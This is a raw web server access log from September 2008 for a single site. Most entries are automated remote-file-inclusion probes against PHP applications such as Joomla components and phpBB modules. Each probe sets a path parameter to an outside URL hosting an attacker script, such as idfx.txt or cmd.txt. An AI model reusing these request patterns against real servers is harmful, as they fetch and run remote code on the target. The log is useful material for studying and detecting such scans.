219.85.63.226 - - [22/Sep/2008:10:21:24 -0700] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://www.crosstalk.cc/NT_files/idfx.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
219.85.63.226 - - [22/Sep/2008:10:21:24 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.crosstalk.cc/NT_files/idfx.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
219.85.63.226 - - [22/Sep/2008:10:21:25 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.crosstalk.cc/NT_files/idfx.txt%0D? HTTP/1.1" 200 94817 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
70.86.37.2 - - [22/Sep/2008:10:21:26 -0700] "GET //include/write.php?dir=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.37.2 - - [22/Sep/2008:10:21:26 -0700] "GET /logs//include/write.php?dir=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.19.144.26 - - [22/Sep/2008:10:21:47 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://83.19.144.26/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
92.48.68.79 - - [22/Sep/2008:10:21:48 -0700] "GET /logs/access_080825.log//administrator/index.php?option=com_dbquery&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
92.48.68.79 - - [22/Sep/2008:10:21:54 -0700] "GET /logs/access_080824.log//administrator/index.php?option=com_dbquery&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:21:56 -0700] "GET //inc/functions.inc.php?config[ppa_root_path]=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:21:57 -0700] "GET /logs//inc/functions.inc.php?config[ppa_root_path]=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
83.19.144.26 - - [22/Sep/2008:10:21:58 -0700] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://83.19.144.26/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:22:02 -0700] "GET /logs/access_071127.log//inc/functions.inc.php?config[ppa_root_path]=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
219.85.63.226 - - [22/Sep/2008:10:22:09 -0700] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://www.crosstalk.cc/NT_files/idfx.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
219.85.63.226 - - [22/Sep/2008:10:22:09 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.crosstalk.cc/NT_files/idfx.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
219.85.63.226 - - [22/Sep/2008:10:22:10 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.crosstalk.cc/NT_files/idfx.txt%0D? HTTP/1.1" 200 94801 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
77.221.130.16 - - [22/Sep/2008:10:22:15 -0700] "GET /logs/access_080723.log/errors.php?error=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.16 - - [22/Sep/2008:10:22:15 -0700] "GET /errors.php?error=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.16 - - [22/Sep/2008:10:22:16 -0700] "GET /logs/errors.php?error=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
219.85.63.226 - - [22/Sep/2008:10:22:32 -0700] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://www.crosstalk.cc/NT_files/idfx.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
210.116.102.204 - - [22/Sep/2008:10:22:34 -0700] "GET /logs/access.log/classes/core/language.php?rootdir=http://www.saddlebrookhorsecenter.com/Events/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.116.102.204 - - [22/Sep/2008:10:22:35 -0700] "GET /classes/core/language.php?rootdir=http://www.saddlebrookhorsecenter.com/Events/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.116.102.204 - - [22/Sep/2008:10:22:35 -0700] "GET /logs/classes/core/language.php?rootdir=http://www.saddlebrookhorsecenter.com/Events/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
142.150.98.171 - - [22/Sep/2008:10:23:25 -0700] "GET /?sourcedir=http://chebugis.net/chid.txt??? HTTP/1.1" 200 94671 "-" "libwww-perl/5.79" "www.dmulk.com"
193.253.223.90 - - [22/Sep/2008:10:23:40 -0700] "GET /logs/access_080902.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.253.223.90 - - [22/Sep/2008:10:23:54 -0700] "GET /logs/access_080831.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.85.63.226 - - [22/Sep/2008:10:24:00 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.crosstalk.cc/NT_files/idfx.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
219.85.63.226 - - [22/Sep/2008:10:24:00 -0700] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.crosstalk.cc/NT_files/idfx.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
219.85.63.226 - - [22/Sep/2008:10:24:00 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.crosstalk.cc/NT_files/idfx.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
219.85.63.226 - - [22/Sep/2008:10:24:18 -0700] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://www.crosstalk.cc/NT_files/idfx.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:10:24:22 -0700] "GET /logs/access_080219.log///vwar/backup/errors.php?error=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.119.195.22 - - [22/Sep/2008:10:24:22 -0700] "GET /logs/access_080606.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.119.195.22 - - [22/Sep/2008:10:24:22 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.119.195.22 - - [22/Sep/2008:10:24:23 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.119.195.22 - - [22/Sep/2008:10:24:23 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.220.215.63 - - [22/Sep/2008:10:24:33 -0700] "GET /logs/access_080301.log//components/com_flyspray/startdown.php?file=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.220.215.63 - - [22/Sep/2008:10:24:33 -0700] "GET //components/com_flyspray/startdown.php?file=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.220.215.63 - - [22/Sep/2008:10:24:33 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.220.215.63 - - [22/Sep/2008:10:24:49 -0700] "GET /logs/access_080324.log//components/com_flyspray/startdown.php?file=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.221.130.16 - - [22/Sep/2008:10:25:09 -0700] "GET /logs/access_080725.log/errors.php?error=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.86.37.2 - - [22/Sep/2008:10:25:21 -0700] "GET /logs/access_080708.log//include/write.php?dir=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:10:25:24 -0700] "GET /logs/access_080904.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
219.85.63.226 - - [22/Sep/2008:10:25:25 -0700] "GET /logs/access_080613.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.crosstalk.cc/NT_files/idfx.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
208.116.1.202 - - [22/Sep/2008:10:25:35 -0700] "GET /logs/access_071213.log%20//forum/language/lang_english/lang_main_album.php?phpbb_root_path=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.86.37.2 - - [22/Sep/2008:10:25:37 -0700] "GET //include/write.php?dir=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:10:25:55 -0700] "GET /logs/access_071127.log//inc/functions.inc.php?config[ppa_root_path]=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
74.220.215.63 - - [22/Sep/2008:10:26:01 -0700] "GET //components/com_flyspray/startdown.php?file=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [22/Sep/2008:10:26:06 -0700] "GET /logs/access_080401.log//?option=com_content&task=view&id=1603/index2.php=http://zer0web.webcindario.com/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [22/Sep/2008:10:26:11 -0700] "GET /logs//?option=com_content&task=view&id=1603/index2.php=http://zer0web.webcindario.com/v7id.txt???? HTTP/1.1" 200 66168 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [22/Sep/2008:10:26:12 -0700] "GET //?option=com_content&task=view&id=1603/index2.php=http://zer0web.webcindario.com/v7id.txt???? HTTP/1.1" 200 95062 "-" "libwww-perl/5.810" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:10:26:14 -0700] "GET /logs/access_080906.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:10:26:16 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
205.234.198.174 - - [22/Sep/2008:10:26:27 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://ebooks.siteburg.com/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.198.174 - - [22/Sep/2008:10:26:27 -0700] "GET /logs/access_080205.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://ebooks.siteburg.com/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.198.174 - - [22/Sep/2008:10:26:27 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://ebooks.siteburg.com/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.198.174 - - [22/Sep/2008:10:26:27 -0700] "GET /logs/access_080519.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://ebooks.siteburg.com/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.6.18.225 - - [22/Sep/2008:10:26:33 -0700] "GET /logs/access_080719.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.20.229.11 - - [22/Sep/2008:10:26:42 -0700] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://www.fittkau-edv.de/attachments/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:26:48 -0700] "GET /logs/access_080129.log//inc/functions.inc.php?config[ppa_root_path]=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:26:54 -0700] "GET /logs/access_080129.log//inc/functions.inc.php?config[ppa_root_path]=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:27:14 -0700] "GET /logs/access_080307.log//claroline/phpbb/page_tail.php?includePath=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:27:14 -0700] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:27:15 -0700] "GET //claroline/phpbb/page_tail.php?includePath=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
65.55.211.23 - - [22/Sep/2008:10:27:32 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
65.55.211.23 - - [22/Sep/2008:10:27:34 -0700] "GET /blog/index.php/2008/06/05/crestoc-2008-5302008-612008/trackback/ HTTP/1.1" 200 7933 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
190.138.172.60 - - [22/Sep/2008:10:27:46 -0700] "GET /logs/?sourcedir=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 200 66163 "-" "libwww-perl/5.805" "www.dmulk.com"
190.138.172.60 - - [22/Sep/2008:10:28:00 -0700] "GET /?sourcedir=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 200 94715 "-" "libwww-perl/5.805" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:28:05 -0700] "GET /logs/access_071127.log//inc/functions.inc.php?config[ppa_root_path]=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
208.116.1.202 - - [22/Sep/2008:10:28:12 -0700] "GET //mambots/content/smoothgallery/css/jd.gallery.css//mambots/content/josowbot.content.php?mosConfig_absolute_path=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.116.1.202 - - [22/Sep/2008:10:28:12 -0700] "GET /logs/access_080502.log//mambots/content/smoothgallery/css/jd.gallery.css//mambots/content/josowbot.content.php?mosConfig_absolute_path=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.116.1.202 - - [22/Sep/2008:10:28:12 -0700] "GET /logs//mambots/content/smoothgallery/css/jd.gallery.css//mambots/content/josowbot.content.php?mosConfig_absolute_path=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:10:28:12 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:28:27 -0700] "GET /logs//inc/functions.inc.php?config[ppa_root_path]=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
211.115.64.145 - - [22/Sep/2008:10:28:37 -0700] "GET /logs/access_080816.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.64.145 - - [22/Sep/2008:10:28:40 -0700] "GET /logs/access_080816.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.64.145 - - [22/Sep/2008:10:28:50 -0700] "GET /logs/access_080812.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.119.195.22 - - [22/Sep/2008:10:28:50 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.218.85.18 - - [22/Sep/2008:10:28:53 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.geocities.com/nove.li/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.64.145 - - [22/Sep/2008:10:28:56 -0700] "GET /logs/access_080812.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.79.245.90 - - [22/Sep/2008:10:29:11 -0700] "GET /logs/access_080905.log//errors.php?error=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.245.90 - - [22/Sep/2008:10:29:12 -0700] "GET //errors.php?error=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.245.90 - - [22/Sep/2008:10:29:12 -0700] "GET /logs//errors.php?error=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.19.144.26 - - [22/Sep/2008:10:29:24 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://83.19.144.26/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [22/Sep/2008:10:29:24 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://83.19.144.26/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [22/Sep/2008:10:29:25 -0700] "GET /logs/access_080330.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://83.19.144.26/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
211.229.208.165 - - [22/Sep/2008:10:29:29 -0700] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.229.208.165 - - [22/Sep/2008:10:29:29 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.229.208.165 - - [22/Sep/2008:10:29:30 -0700] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.229.208.165 - - [22/Sep/2008:10:29:31 -0700] "GET //index.php?DOCUMENT_ROOT=http://chebugis.net/chid.txt??? HTTP/1.1" 200 94729 "-" "libwww-perl/5.79" "www.dmulk.com"
83.19.144.26 - - [22/Sep/2008:10:29:32 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://83.19.144.26/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
204.8.223.144 - - [22/Sep/2008:10:29:33 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.trade-an-item.com/docs/sql/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.8.223.144 - - [22/Sep/2008:10:29:33 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.trade-an-item.com/docs/sql/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.8.223.144 - - [22/Sep/2008:10:29:43 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.trade-an-item.com/docs/sql/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.8.223.144 - - [22/Sep/2008:10:29:44 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.trade-an-item.com/docs/sql/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.5.163.212 - - [22/Sep/2008:10:29:56 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.48.102.49 - - [22/Sep/2008:10:29:56 -0700] "GET /logs/access_080826.log//administrator/index.php?option=com_dbquery&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.48.68.79 - - [22/Sep/2008:10:30:08 -0700] "GET /logs/access_080826.log//administrator/index.php?option=com_dbquery&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.67.119 - - [22/Sep/2008:10:30:35 -0700] "GET /logs/access_080301.log//components/com_flyspray/startdown.php?file=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.119 - - [22/Sep/2008:10:30:36 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.119 - - [22/Sep/2008:10:30:36 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.220.215.63 - - [22/Sep/2008:10:30:43 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.220.215.63 - - [22/Sep/2008:10:30:43 -0700] "GET //components/com_flyspray/startdown.php?file=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:30:45 -0700] "GET /logs/access_080307.log//claroline/phpbb/page_tail.php?includePath=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:30:45 -0700] "GET //claroline/phpbb/page_tail.php?includePath=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
89.108.67.119 - - [22/Sep/2008:10:30:51 -0700] "GET /logs/access_080324.log//components/com_flyspray/startdown.php?file=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
62.140.18.71 - - [22/Sep/2008:10:30:56 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://83.19.144.26/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.140.18.71 - - [22/Sep/2008:10:30:56 -0700] "GET /logs/access_071125.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://83.19.144.26/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.140.18.71 - - [22/Sep/2008:10:30:56 -0700] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://83.19.144.26/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.140.18.71 - - [22/Sep/2008:10:30:56 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://83.19.144.26/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
